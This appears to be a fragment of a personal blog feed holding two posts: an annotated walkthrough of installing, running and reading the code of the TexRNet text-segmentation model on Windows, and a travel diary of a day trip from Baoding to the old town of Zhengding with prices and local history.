    • split.json is the official train/val/test split.

    • [Optional] the older label version used in our paper, for reproducing the paper's results: semantic_label_v1.tar.gz
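    A sketch of turning those documented label values into a binary text mask (the filename is a placeholder for a real [dataID]):

    import numpy as np
    from PIL import Image

    m = np.array(Image.open("0001_maskfg.png"))  # hypothetical [dataID]_maskfg.png
    text_mask = np.isin(m, (100, 200))           # word pixels plus word-effect pixels
    valid = m != 255                             # drop the ignore label
    print(text_mask.shape, text_mask[valid].mean())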

    TexRNet

    There are two backbones, each with its own strengths:

    • HRNetV2-W48
    • DeeplabV3+

    Download the relevant files from TexRNet - Google Drive:

    • for testing: texrnet_hrnet.pth and texrnet_deeplab.pth

    • for training: init/*

    Setup

1. Create a new conda environment:

    conda create -n texrnet python=3.7
    conda activate texrnet

2. Install PyTorch offline (after being burned n times I'm getting practiced at this, orz; the offline route just works). From download.pytorch.org/whl/torch_stable.html, download the matching pytorch and torchvision wheels:
    • torch-1.13.1+cu117-cp37-cp37m-win_amd64.whl
    • torchvision-0.14.1+cu117-cp37-cp37m-win_amd64.whl

    No idea why Edge was downloading so slowly today; I fell back to Xunlei.

    png

    pip install torch-1.13.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
    pip install torchvision-0.14.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple

    png

3. Clone the repo: SHI-Labs/Rethinking-Text-Segmentation: [CVPR 2021] Rethinking Text Segmentation: A Novel Dataset and A Text-Specific Refinement Approach (github.com)

4. In the repo directory, delete torch==1.6 and torchvision==0.7 from requirement.txt, then run:

    pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
5. In the repo directory, create the following folders:
    • pretrained
      • pretrained/init
    • data
    • log

    png

6. Place the dataset under data/TextSeg:

    png

    Testing

1. Fix the code first! Windows pitfall: Pytorch 报错解决——(亲测有效)RuntimeError: Distributed package doesn‘t have NCCL built in_康康好老啊的博客-CSDN 博客. In PyCharm, Ctrl+Shift+R and replace every nccl with gloo.

2. Set the arguments: --eval --pth pretrained/texrnet_hrnet.pth --hrnet --gpu 0 --dsname textseg

    png

3. It runs. The GPU fan spun up so furiously that I got scared and killed it 😅. Back to the server it is, sob...

    png

    Training

1. Set the arguments: --hrnet --gpu 0 --dsname textseg --trainwithcls

    png

2. Pitfall: in data\TextSeg, rename the annotation folder to bpoly_label

    png

3. It should train, right? "Out of GPU memory", just great 😅. Back to the server, sob... (Is it because of the gloo switch? Time to properly learn Linux, sob.)

    png

    Well, well! Shrinking cfg.DATA.NUM_WORKERS_PER_GPU in train_utils.py makes it run again!

    if not cfg.DEBUG:
        cfg.DATA.NUM_WORKERS_PER_GPU = 2
        cfg.TRAIN.BATCH_SIZE_PER_GPU = 2
        cfg.TRAIN.OPTIM_MANAGER_LRSCALE = {
            'hrnet': 1, 'texrnet': 10}
        return cfg

    Nope, still won't run. Giao!

    File "D:\Study\XXXXX\Rethinking-Text-Segmentation\lib\torchutils.py", line 262, in __call__
        return y
    UnboundLocalError: local variable 'y' referenced before assignment

    Reading the code

    This repo's code feels rather cryptic... layer upon layer of it.

    main.py

    --eval --pth pretrained/texrnet_hrnet.pth --hrnet --gpu 0 --dsname textseg

    meaning:

    • enable eval mode
    • pretrained model path: pretrained/texrnet_hrnet.pth
    • use the HRNet model
    • use GPU 0
    • dataset: textseg

    Parser arguments (a sketch of the equivalent argparse declaration follows the table):

    name           | type | default   | help
    --debug        | bool | False     | enable debug mode
    --hrnet        | bool | False     | use the HRNet model
    --eval         | bool | False     | enable eval mode
    --pth          | str  |           | path to saved weights, i.e. the pretrained model
    --gpu          |      |           | which GPUs to use
    --port         | int  | 11233     | port for distributed processing
    --dsname       | str  | 'textseg' | dataset name, one of 'textseg', 'cocots', 'mlt', 'icdar13', 'totaltext'
    --trainwithcls | bool | False     | train with the classifier
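    A hedged reconstruction of that CLI; names and defaults come from the table, while the real main.py may declare them slightly differently:

    import argparse

    p = argparse.ArgumentParser()
    p.add_argument("--debug", action="store_true")
    p.add_argument("--hrnet", action="store_true")
    p.add_argument("--eval", action="store_true")
    p.add_argument("--pth", type=str)                 # path to pretrained weights
    p.add_argument("--gpu", nargs="+", type=int)      # which GPUs to use
    p.add_argument("--port", type=int, default=11233)
    p.add_argument("--dsname", type=str, default="textseg",
                   choices=["textseg", "cocots", "mlt", "icdar13", "totaltext"])
    p.add_argument("--trainwithcls", action="store_true")
    args = p.parse_args()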

    istrain = not args.eval: if eval mode is not enabled, train mode is.

    # Choose train vs. eval config
    if istrain:
        cfg = copy.deepcopy(cfg_train)
    else:
        cfg = copy.deepcopy(cfg_test)

    if istrain:
        # In training mode, get_experiment_id() allocates a fresh experiment ID,
        # so every run gets its own ID and multiple trained models stay distinguishable
        cfg.EXPERIMENT_ID = get_experiment_id()
    else:
        # Not part of any experiment
        cfg.EXPERIMENT_ID = None

    # Choose the dataset config
    if args.dsname == "textseg":
        cfg_data = cfg_textseg
    elif args.dsname == "cocots":
        cfg_data = cfg_cocots
    elif args.dsname == "mlt":
        cfg_data = cfg_mlt
    elif args.dsname == "icdar13":
        cfg_data = cfg_icdar13
    elif args.dsname == "totaltext":
        cfg_data = cfg_totaltext
    else:
        raise ValueError

    cfg.DEBUG = args.debug
    cfg.DIST_URL = 'tcp://127.0.0.1:{}'.format(args.port)
    if args.gpu is None:
        # No GPU given: use all of them
        cfg.GPU_DEVICE = 'all'
    else:
        # Use the specified GPUs
        cfg.GPU_DEVICE = args.gpu

    # Load model and data configs
    cfg.MODEL = copy.deepcopy(cfg_mdel)
    cfg.DATA = copy.deepcopy(cfg_data)

    if istrain:
        cfg = set_cfg_train(cfg, dsname=args.dsname)
        if args.hrnet:
            # Configure the HRNet-W48 model for training
            cfg = set_cfg_hrnetw48_train(cfg)
    else:
        cfg = set_cfg_eval(cfg, dsname=args.dsname)
        if args.hrnet:
            cfg = set_cfg_hrnetw48_eval(cfg)
        # Load the pretrained model
        cfg.MODEL.TEXRNET.PRETRAINED_PTH = args.pth

    # Choose the dataset split
    if istrain:
        if args.dsname == "textseg":
            cfg.DATA.DATASET_MODE = 'train+val'
        elif args.dsname == "cocots":
            cfg.DATA.DATASET_MODE = 'train'
        elif args.dsname == "mlt":
            cfg.DATA.DATASET_MODE = 'trainseg'
        elif args.dsname == "icdar13":
            cfg.DATA.DATASET_MODE = 'train_fst'
        elif args.dsname == "totaltext":
            cfg.DATA.DATASET_MODE = 'train'
        else:
            raise ValueError
    else:
        if args.dsname == "textseg":
            cfg.DATA.DATASET_MODE = 'test'
        elif args.dsname == "cocots":
            cfg.DATA.DATASET_MODE = 'val'
        elif args.dsname == "mlt":
            cfg.DATA.DATASET_MODE = 'valseg'
        elif args.dsname == "icdar13":
            cfg.DATA.DATASET_MODE = 'test_fst'
        elif args.dsname == "totaltext":
            cfg.DATA.DATASET_MODE = 'test'
        else:
            raise ValueError

    if istrain:
        if args.trainwithcls:  # train together with the classifier
            if args.dsname == 'textseg':  # dataset-specific pipelines
                cfg.DATA.LOADER_PIPELINE = [
                    'NumpyImageLoader',        # read image data via numpy
                    'TextSeg_SeglabelLoader',  # load text-region segmentation labels
                    'CharBboxSpLoader',]       # load character bounding boxes; all used for text detection/segmentation
                cfg.DATA.RANDOM_RESIZE_CROP_SIZE = [32, 32]     # random-crop size
                cfg.DATA.RANDOM_RESIZE_CROP_SCALE = [0.8, 1.2]  # scale range
                cfg.DATA.RANDOM_RESIZE_CROP_RATIO = [3/4, 4/3]  # aspect-ratio range
                cfg.DATA.TRANS_PIPELINE = [
                    'UniformNumpyType',                  # cast image data to one dtype for later stages
                    'TextSeg_RandomResizeCropCharBbox',  # random rescale/crop of seg labels and char boxes, for robustness
                    'NormalizeUint8ToZeroOne',           # normalize pixels from [0, 255] to [0, 1]
                    'Normalize',                         # zero-mean, unit-variance standardization
                    'RandomScaleOneSide',                # scale one side of the image, for scale robustness
                    'RandomCrop',                        # random crop of the image
                ]
            elif args.dsname == 'icdar13':
                cfg.DATA.LOADER_PIPELINE = [
                    'NumpyImageLoader',   # read image data via numpy
                    'SeglabelLoader',     # load text-region segmentation labels
                    'CharBboxSpLoader',]  # load character bounding boxes
                cfg.DATA.TRANS_PIPELINE = [
                    'UniformNumpyType',         # cast image data to one dtype for later stages
                    'NormalizeUint8ToZeroOne',  # normalize pixels from [0, 255] to [0, 1]
                    'Normalize',                # zero-mean, unit-variance standardization
                    'RandomScaleOneSide',       # scale one side of the image, for scale robustness
                    'RandomCrop',               # random crop of the image
                ]
            else:
                raise ValueError
            # Format the data as text regions plus character-box labels for detection/recognition training
            cfg.DATA.FORMATTER = 'SemChinsChbbxFormatter'
            # Square up character boxes so RoI pooling is straightforward
            cfg.DATA.LOADER_SQUARE_BBOX = True
            # Which stage the random resize-crop starts from; 'sem' = the semantic segmentation stage
            cfg.DATA.RANDOM_RESIZE_CROP_FROM = 'sem'
            # Which stage the network takes its in-training predictions from; also 'sem'
            cfg.MODEL.TEXRNET.INTRAIN_GETPRED_FROM = 'sem'
            # the one with 93.98% and trained on semantic crops
            # Path to the classifier's pretrained weights
            cfg.TRAIN.CLASSIFIER_PATH = osp.join(
                'pretrained', 'init', 'resnet50_textcls.pth',
            )
            # Box padding mode for RoI pooling; 'semcrop' here
            cfg.TRAIN.ROI_BBOX_PADDING_TYPE = 'semcrop'
            # Output size after RoI pooling
            cfg.TRAIN.ROI_ALIGN_SIZE = [32, 32]
            # Whether the classifier itself gets updated
            cfg.TRAIN.UPDATE_CLASSIFIER = False
            # How many iterations into training to activate the classifier for the seg model
            cfg.TRAIN.ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER = 0
            # Loss weights: semantic seg, refinement, refinement-trimap, classifier
            cfg.TRAIN.LOSS_WEIGHT = {
                'losssem'   : 1,
                'lossrfn'   : 0.5,
                'lossrfntri': 0.5,
                'losscls'   : 0.1,
            }

    if istrain:
        # Whether HRNet is the semantic segmentation backbone; otherwise deeplab
        if args.hrnet:
            cfg.TRAIN.SIGNATURE = ['texrnet', 'hrnet']
        else:
            cfg.TRAIN.SIGNATURE = ['texrnet', 'deeplab']
        # LOG_DIR: log directory; in training mode, create a new experiment folder
        # and write the log to 'train.log' inside it
        cfg.LOG_DIR = experiment_folder(cfg, isnew=True, sig=cfg.TRAIN.SIGNATURE)
        cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'train.log')
    else:
        # In eval mode, write the log to 'eval.log'
        cfg.LOG_DIR = osp.join(cfg.MISC_DIR, 'eval')
        cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'eval.log')
        cfg.TEST.SUB_DIR = None

    if cfg.DEBUG:
        # In debug mode, set the experiment ID to 999999999999 so debug runs are easy to spot
        cfg.EXPERIMENT_ID = 999999999999
        # Data-loader workers per GPU
        cfg.DATA.NUM_WORKERS_PER_GPU = 0
        # Batch size per GPU
        cfg.TRAIN.BATCH_SIZE_PER_GPU = 2

    cfg = common_initiates(cfg)  # loads train/test data and runs preprocessing, normalization, etc.

    if istrain:
        if args.trainwithcls:
            # Execution stages for training; with the classifier, ts_with_classifier() builds them
            exec_ts = ts_with_classifier()
        else:
            # Otherwise ts() builds the stages
            exec_ts = ts()
        # The trainer object
        trainer = train(cfg)
        # Register the training stages with the trainer: data loading, forward,
        # backward, parameter updates, and so on
        trainer.register_stage(exec_ts)

        # trainer(0)
        # Train with multiple processes; nprocs=GPU_COUNT parallelizes across GPUs.
        # join=True blocks here until every process has finished and exited
        mp.spawn(trainer,
                 args=(),
                 nprocs=cfg.GPU_COUNT,
                 join=True)
    else:
        # Execution stages for testing
        exec_es = es()
        # The tester object
        tester = eval(cfg)
        # Register the test stages with the tester: data loading, forward, evaluation, and so on
        tester.register_stage(exec_es)

        # tester(0)
        # Test with multiple processes; nprocs=GPU_COUNT parallelizes across GPUs.
        # join=True blocks here until every process has finished and exited
        mp.spawn(tester,
                 args=(),
                 nprocs=cfg.GPU_COUNT,
                 join=True)

    When it starts running, the full parameter dump is printed:

    {'COMPUTER_NAME': 'OMEN',  // computer name
    'CUDA': True, // whether CUDA is available
    'DATA': {'ALIGN_CORNERS': True, // whether to align image corners
    'CLASS_NAME': ['background', 'text'], // class names; two classes here, 'background' and 'text'
    'CLASS_NUM': 2, // number of classes
    'DATASET_MODE': 'train+val', // dataset split; training and validation sets combined here
    'DATASET_NAME': 'textseg', // dataset name, 'textseg' here
    'EFFECTIVE_CLASS_NUM': 2, // number of effective classes
    'FORMATTER': 'SemChinsChbbxFormatter', // data formatter name, 'SemChinsChbbxFormatter' here
    'IGNORE_LABEL': 999, // label value to ignore, 999 here
    'IM_MEAN': [0.485, 0.456, 0.406], // per-channel image means
    'IM_STD': [0.229, 0.224, 0.225], // per-channel image standard deviations
    'LOADER_DERIVED_CLS_MAP_TO': 'bg', // class that loader-derived classes map to
    'LOADER_PIPELINE': ['NumpyImageLoader', // data-loading pipeline
    'TextSeg_SeglabelLoader',
    'CharBboxSpLoader'],
    'LOADER_SQUARE_BBOX': True, // whether character bboxes are squared when loading
    'LOAD_BACKEND_IMAGE': 'pil', // image-reading backend
    'LOAD_IS_MC_IMAGE': False, // whether images are multi-channel
    'LOAD_IS_MC_SEGLABEL': True, // whether loaded labels are multi-channel
    'NUM_WORKERS': 5, // data-loading worker count
    'NUM_WORKERS_PER_GPU': 5, // data-loading workers per GPU
    'RANDOM_CROP_FILL': {'image': [0, 0, 0], 'seglabel': [999]}, // fill values for random cropping
    'RANDOM_CROP_PADDING_MODE': 'random', // padding mode, 'random' here
    'RANDOM_CROP_SIZE': [513, 513], // output size of random crops
    'RANDOM_RESIZE_CROP_FROM': 'sem', // resize the semantic label to target size before random cropping
    'RANDOM_RESIZE_CROP_RATIO': [0.75, 1.3333333333333333], // aspect-ratio range for the resize
    'RANDOM_RESIZE_CROP_SCALE': [0.8, 1.2], // scale range for the resize
    'RANDOM_RESIZE_CROP_SIZE': [32, 32], // minimum semantic-label size guaranteed before resizing
    'RANDOM_SCALE_ONESIDE_ALIGN_CORNERS': True, // whether to align image corners
    'RANDOM_SCALE_ONESIDE_DIM': 'shortside', // which side is scaled; the short side here
    'RANDOM_SCALE_ONESIDE_RANGE': [513, 1025], // size range for the scaling
    'ROOT_DIR': 'D:\\Study\\XXX\\TextSeg', // dataset directory
    'SEGLABEL_IGNORE_LABEL': 999, // label value to ignore, 999 here
    'SEMANTIC_PICK_CLASS': 'all', // which semantic classes to pick, 'all' here
    'TRANS_PIPELINE': ['UniformNumpyType', // image preprocessing pipeline
    'TextSeg_RandomResizeCropCharBbox',
    'NormalizeUint8ToZeroOne',
    'Normalize',
    'RandomScaleOneSide',
    'RandomCrop'],
    'TRY_SAMPLE': None}, // number of samples to try
    'DEBUG': False, // whether debug mode is on
    'DIST_BACKEND': 'gloo', // distributed-training backend, 'gloo' here
    'DIST_URL': 'tcp://127.0.0.1:11233', // distributed-training URL
    'EXPERIMENT_ID': 168471973979, // experiment ID
    'GPU_COUNT': 1, // number of GPUs used
    'GPU_DEVICE': [0], // GPU indices used
    'LOG_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet', // log directory
    'LOG_FILE': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet\\train.log', // log file path
    'MAINLOOP_EXECUTE': True, // whether to run the main loop
    'MAIN_CODE': ['main.py', 'train_utils.py', 'eval_utils.py'], // main code files
    'MAIN_CODE_PATH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation', // code path
    'MATPLOTLIB_MODE': 'Agg', // Matplotlib backend
    'MISC_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log', // directory for miscellaneous files
    // model config: the HRNet model's detailed parameters and structure
    'MODEL': {'HRNET': {'ALIGN_CORNERS': True, // whether align_corners is used
    'BN_MOMENTUM': 'hardcoded to 0.1', // batch-norm momentum
    'FINAL_CONV_KERNEL': 1, // final conv kernel size
    'IGNORE_LABEL': 999, // label value to ignore
    'INTRAIN_GETPRED': False, // whether predictions are computed during training
    'LOSS_TYPE': 'ce', // loss function type
    'MODEL_TAGS': ['v0', 'base'], // model tags
    'OUTPUT_CHANNEL_NUM': 720, // model output channels
    'PRETRAINED_PTH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\pretrained\\init\\hrnetv2_w48_imagenet_pretrained.pth.base', // pretrained weights path
    'STAGE1_PARA': {'BLOCK': 'BOTTLENECK', // block type used in HRNet
    'FUSE_METHOD': 'SUM', // feature-fusion method on each branch
    'NUM_BLOCKS': [4], // blocks per branch
    'NUM_BRANCHES': 1, // number of branches
    'NUM_CHANNELS': [64], // channels per branch
    'NUM_MODULES': 1}, // number of modules
    'STAGE2_PARA': {'BLOCK': 'BASIC',
    'FUSE_METHOD': 'SUM',
    'NUM_BLOCKS': [4, 4],
    'NUM_BRANCHES': 2,
    'NUM_CHANNELS': [48, 96],
    'NUM_MODULES': 1},
    'STAGE3_PARA': {'BLOCK': 'BASIC',
    'FUSE_METHOD': 'SUM',
    'NUM_BLOCKS': [4, 4, 4],
    'NUM_BRANCHES': 3,
    'NUM_CHANNELS': [48, 96, 192],
    'NUM_MODULES': 4},
    'STAGE4_PARA': {'BLOCK': 'BASIC',
    'FUSE_METHOD': 'SUM',
    'NUM_BLOCKS': [4, 4, 4, 4],
    'NUM_BRANCHES': 4,
    'NUM_CHANNELS': [48, 96, 192, 384],
    'NUM_MODULES': 3}},
    'MODEL_NAME': 'texrnet', // model name
    'TEXRNET': {'ALIGN_CORNERS': True, // whether align_corners is used
    'BIAS_ATTENTION_TYPE': 'cossim', // bias-attention type
    'BN_TYPE': 'bn', // batch-norm layer type
    'CONV_TYPE': 'conv', // conv layer type
    'INIT_BIAS_ATTENTION_WITH': None, // which attention layer initializes the bias attention
    'INPUT_CHANNEL_NUM': 720, // input tensor channels
    'INTRAIN_GETPRED_FROM': 'sem', // source of in-training predictions; 'sem' = semantic segmentation
    'MODEL_TAGS': ['hrnet'], // model tags
    'PRETRAINED_PTH': None, // pretrained weights path
    'REFINEMENT_CHANNEL_NUM': [725, 64, 64], // output channels of the refinement layers
    'REFINEMENT_LOSS_TYPE': {'lossrfn': 'ce', // refinement loss types
    'lossrfntri': 'trimapce'},
    'RELU_TYPE': 'relu', // ReLU activation type
    'SEMANTIC_CLASS_NUM': 2, // number of semantic classes
    'SEMANTIC_IGNORE_LABEL': 999, // ignored label in semantic segmentation
    'SEMANTIC_LOSS_TYPE': 'ce'}}, // semantic segmentation loss type
    'RND_RECORDING': False, // whether the RNG state is recorded
    'RND_SEED': 2, // random seed
    'SAVE_CODE': True, // whether to save the code
    'TORCH_VERSION': '1.13.1+cu117', // PyTorch version
    'TRAIN': {'ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER': 0, // iteration after which the classifier is activated for the seg model
    'ACTIVATE_REFINEMENT_AT_ITER': 0, // iteration at which the refinement module is activated
    'BATCH_SIZE': 5, // total batch size
    'BATCH_SIZE_PER_GPU': 5, // batch size per GPU
    'CKPT_EVERY': inf, // checkpoint interval
    'CLASSIFIER_PATH': 'pretrained\\init\\resnet50_textcls.pth', // classifier path
    'COMMENT': '>>>>later<<<<', // free-form training comment
    'DISPLAY': 10, // log every N iterations
    'LOSS_WEIGHT': {'losscls': 0.1, // weights of the different losses
    'lossrfn': 0.5,
    'lossrfntri': 0.5,
    'losssem': 1},
    'LOSS_WEIGHT_NORMALIZED': False, // whether loss weights are normalized
    'LR_BASE': 0.01, // base learning rate
    'LR_ITER_BY': 'iter', // LR schedule unit; 'iter' = update per iteration
    'LR_TYPE': [('linear', 0, 0.01, 500), ('ploy', 0.01, 0, 20000, 0.9)], // LR schedule; two phases, 'linear' then 'ploy' (poly)
    'MAX_STEP': 20500, // maximum number of iterations or epochs
    'MAX_STEP_TYPE': 'iter', // unit of MAX_STEP; counted in iterations here
    'OPTIMIZER': 'sgd', // optimizer type; stochastic gradient descent here
    'OPTIM_MANAGER_LRSCALE': {'hrnet': 1, 'texrnet': 10}, // per-module LR scale in the optimizer, keyed by 'hrnet' and 'texrnet'
    'OVERFIT_A_BATCH': False, // whether to overfit a single batch as a sanity check
    'ROI_ALIGN_SIZE': [32, 32], // Region of Interest (RoI) Align output size
    'ROI_BBOX_PADDING_TYPE': 'semcrop', // padding type for RoI Align
    'SAVE_CODE': True, // whether to save the code
    'SAVE_INIT_MODEL': True, // whether to save the initial model
    'SGD_MOMENTUM': 0.9, // SGD momentum
    'SGD_WEIGHT_DECAY': 0.0005, // SGD weight decay
    'SIGNATURE': ['texrnet', 'hrnet'], // model signature
    'SKIP_PARTIAL': True, // whether to skip partial (incomplete) batches
    'UPDATE_CLASSIFIER': False, // whether classifier parameters are updated
    'USE_OPTIM_MANAGER': True, // whether the optimizer manager is used
    'VISUAL': False}} // whether to visualize
    ]]>
@@ -6995,7 +6995,7 @@ /posts/Diary-%E6%AD%A3%E5%AE%9A%E4%B9%8B%E6%97%85/ - Foreword

    This post is the running log of 2023-04-30: a "special forces"-style day trip to Zhengding.

    jpg

    Walked half to death

    Brother Fan can really walk! Fan the mighty, I surrender 😅!

    Main text

    06:03 - Hebei University

    Preparation for the trip:

    • 07:20 - 08:32, train ticket Baoding to Zhengding, ¥18.50
    • 19:50 - 21:04, train ticket Zhengding to Baoding, ¥18.50
    • a bottle of mineral water
    • a power bank
    • a pack of tissues
    • an insulated bag
    • a water flask

    Did a little homework on Xiaohongshu, but not much. And then: off we go!

    jpg

    Hebei University at dawn, first light

    Since I'd never been to Baoding railway station, I budgeted plenty of time to get there. Up at 05:30, bathroom and a quick wash, then waited for the dorm auntie to open the doors at 6:00, ready to set off. I'd planned to grab two roujiamo at the university canteen, but the auntie said the flatbread wasn't warm yet. Fine. My roujiamo 😭.

    I'd gone to bed past 10 the night before, while Brother Fan somehow stayed up until 3 a.m. I worried about him at first; turned out the worry was entirely wasted 😅.

    Sleep at three, rise at five; the King of Hell applauds my health.

    -- Brother Fan

    06:16 - Off we go!

    jpg

    Heading for Baoding station

    We scored our first blunder before even leaving campus. Called a car planning to leave by the side gate, only to find the side gate shut 😅. Afraid of a long wait, we'd booked the car early, but it arrived too fast, so we sprinted to the south gate. Wow, exhausted before the trip even started.

    Taxi drivers up north seem to love to chat; ours told us the roads would be jammed and a lot more besides, but I really can't get used to the Hebei accent! Understood none of it, so out of politeness I just kept going "sure, sure" 😅.

    Hebei University south gate to Baoding station, ¥22.00, about half an hour.

    06:28 - Baoding station

    png

    Crowded, but not too crowded

    This train trip also doubled as a rehearsal for someday taking the train back to school on my own. We were still early, and waited in the station for over half an hour. No breakfast, but Zhengding wasn't far, so we decided to eat there. Quite a crowd. The sight of the train nearly broke me; the inside was, let's say, sanitary-ish 😅.

    08:30 - Zhengding station

    jpg

    The green-skinned train

    Stepping off, the station looked rather shabby 😅. The last station this shabby I saw was in Gansu, maybe?

    jpg

    Charge!

    The very modest Zhengding station

    Zhengding today is a small county seat north of Shijiazhuang, but historically it was one of the strongholds of the Hebei region. Formerly named Zhending, it faces the Hutuo River to the south and controls the Jingxing pass into the Taihang Mountains to the west, a choke point linking Hebei with Shanxi and shielding the capital region. The earliest record of a county here dates to the Qin dynasty, when it was called Dongyuan County. After Emperor Gaozu of Han put down a rebellion here, hoping for a stable realm and a world "truly settled", he renamed it Zhending, a name kept through to the Qing. After the An Lushan rebellion in the Tang, Zhending became the seat of the Chengde military governors, a de facto capital of a semi-independent garrison regime, and developed considerably. The city's layout was rebuilt by military governor Li Baochen in 762. Under the Tang and Song, Buddhism flourished in the city, and many of the surviving old buildings date from then. In the Ming and Qing it was a garrison town guarding the capital, and in the early Qing it even served as the provincial capital (the Zhili governor-general resided in Zhending during the Kangxi era); the name was later changed to Zhengding to avoid the taboo personal name of Emperor Yongzheng, and it has been used ever since. At the start of the 20th century, the Qing court built the Zhengtai railway. Originally planned to run from Zhengding to Taiyuan, its starting point was moved, because of the difficulty of bridging the Hutuo River, to the village of Shijiazhuang on the south bank. Shijiazhuang rose on the back of the railway and eventually became Hebei's provincial capital, while once-glorious Zhengding slowly declined into today's slightly forlorn county town.

    08:44 - Wholesale market

    png

    Eat eat eat

    First order of business off the train: breakfast! Conveniently there's a wholesale market next to the station that sells it. Along the way I sized up Zhengding's streetscape; it honestly felt a notch nicer than downtown Baoding 🤔?

    Some northern breakfast classics:

    • steamed chive-and-egg dumplings, ¥10.00 for a tray of 15
    • jianbing guozi, ¥8.50
    • 1 pork soup bun + 1 tofu-and-green-pepper bun + 1 pumpkin millet congee = 2 × ¥1.50 + 1 × ¥3.00 = ¥6.00

    You have to admire how much Brother Fan can eat 😅. I saved two buns for lunch. Northern wheat food really is good!

    09:40 - Hutuo River ecological scenic area

    png

    Hu-tuo: per the dictionary, a dwelling place of tomb keepers 😅

    The Hutuo River, anciently also written 虖池 or 滹池, is one of the upper tributaries of the Ziya River in the Hai River system. It rises near Qiao'ergou village on Taixi Mountain in Fanshi County, Xinzhou, Shanxi, and flows through Fanshi, Daixian, Yuanping, Xinfu, and Dingxiang in Xinzhou; Yuxian in Yangquan; Pingshan, Lingshou, Zhengding, Gaocheng, Wuji, Jinzhou, and Shenze in Shijiazhuang; Anping, Raoyang, and Wuqiang in Hengshui; and Xianxian in Cangzhou, where it merges with the Fuyang River to form the Ziya. It runs 587 km and drains 27,300 square kilometres.

    A taxi to the Hutuo River ecological area, ¥19.94. The road there smelled of spring! The woods were all lush green.

    • There are boat rentals; I held Brother Fan down so we didn't row 😅

    • A stretch of railway-themed buildings in the middle, showing off how developed Shijiazhuang's railways are: a city hauled into being by trains

    • A bridge under construction in the distance

    • A fake beach, ¥30.00 a go; as a veteran beachcomber I wasn't interested 😃

    • A "firefly galaxy" campsite, ¥199 per pitch for 4 people, with barbecue and camping. Shijiazhuang is clearly working hard on its influencer itineraries!

    • Brother Fan had his eye on the Lanxiu Tower across the river and wanted to walk over. I checked: 4-plus kilometres, nearly 2 hours on foot. Held him down again 😅

    I find myself agreeing with the King of Hell.

    -- Guan somebody

    10:40 - Convention centre

    png

    The international convention centre

    The Shijiazhuang International Convention and Exhibition Centre sits on the north bank of the Hutuo River in the Zhengding New District, west of Xincheng Avenue, near Shijiazhuang Metro Line 1. It occupies about 68.5 hectares, with 160,000 m² of buildings above ground and 30,000 m² underground, comprising a 100,000 m² exhibition centre, a 60,000 m² conference centre, and supporting facilities. As of early May 2008, the build was planned at three years with a total investment of 2 billion yuan, funded entirely by the Shijiazhuang municipal treasury over three years. The project was billed as a major event for the city, a key move in the "a big step every year, a transformation in three" campaign, and deemed significant for rounding out urban functions and boosting the city's image, competitiveness, and influence.

    Walking north to get a bit closer to the old town, we ran into the Shijiazhuang International Convention and Exhibition Centre instead. Brother Fan said he'd never seen one this big; I'd counter that it's still a notch below Fuzhou's Strait International Conference & Exhibition Center 🤔. There was an anime convention and an auto show inside, with plenty of cosers around.

    12:08 - A round of gridlock

    jpg

    Jam after jam; the map app a wall of red

    Brother Fan wanted to walk to the old town too! I checked: 4-plus kilometres, nearly 2 hours. Held him down once more 😅 and called a car, ¥16.14. The friendly driver gave us his take on Shijiazhuang, roughly:

    • Shijiazhuang has little historical depth of its own; it's "the city the railway hauled in". Zhengding and Baoding have more
    • Downtown has little worth visiting; people generally go to Zhengding
    • Many buildings in the old town are merely replica antiques
    • Food inside the old town isn't expensive
    • Local specialities include the eight great bowls and "authentic Anhui beef banmian", which in the driver's accent comes out as "ber noodles" 🤪

    In hindsight the driver was pretty much right on all counts.

    The ride made me hungry, so after getting out I polished off the two buns from breakfast.

    12:13 - Zhengding south wall

    jpg

    "So close, so beautiful: weekends in Hebei"

    The ancient city of Zhengding lies 15 km north of Shijiazhuang, the capital of Hebei. Built according to traditional Chinese planning ideas and architectural styles, it concentrates the historical and cultural character of China from roughly the 5th to the 19th century, a crystallisation of the ingenuity and perseverance of its builders.

    Its long history left the city a dazzling, distinctive collection of monuments, summed up in the saying "three mountains unseen, nine bridges that carry no water, nine towers, four pagodas, eight great temples, and twenty-four gilded memorial arches".
    "Three mountains unseen": the land was historically the seat of the Zhongshan state and the Hengshan and Changshan commanderies (all named for mountains), yet Zhengding itself has no mountains.
    "Nine bridges that carry no water": the single-arch triple-path stone bridge before Longxing Temple and the pan bridges before the halls of the prefectural and county Confucian temples (pan bridges traditionally come as three parallel bridges), none of which spans living water.
    "Nine towers, four pagodas, eight great temples": the four gate towers, four corner towers, and the Yanghe Tower; the four pagodas are the Lingxiao, Hua, Xumi, and Chengling pagodas; the eight temples are Longxing, Guanghui, Linji, Kaiyuan, Tianning, Hongji, Sheli, and Chongyin, the last three now lost.
    "Twenty-four gilded arches": the city once had twenty-four memorial arches large and small, for instance the grand Xu family and Liang family arches, "Ancient Commandery of Changshan", "Sagely Virtue Reaching Heaven", "Virtue Matching Heaven and Earth", "Muduo of the Ten Thousand Ages", and so on.
    History, weather, and above all the decade of Cultural Revolution turmoil destroyed many precious relics, yet with 9 nationally protected sites, 6 provincial ones, and a dozen county-level ones, Zhengding still carries itself like the famous historic city it is.
    It was listed as a provincial-level famous historical and cultural city in 1990 and a national-level one in 1994.

    Historically it ranked with Baoding and Beijing as one of the "three great northern strongholds".

    The wall by the gate carries Hebei tourism's slogan: "So close, so beautiful: weekends in Hebei". Sounds like it's pitched at the Beijing crowd 🤔. The car park did indeed hold plenty of Beijing plates.

    png

    Zhengding south wall

    There's a tower on the south wall, with stairs you can climb for the view.

    12:29 - Yanzhao South Street

    jpg

    Yanzhao South Street, selling things

    We hit the nearest street first, Yanzhao South Street. Nothing I fancied eating, so I bought nothing; Brother Fan got a grilled squid skewer, ¥16.00, and a coffee, ¥5.90.

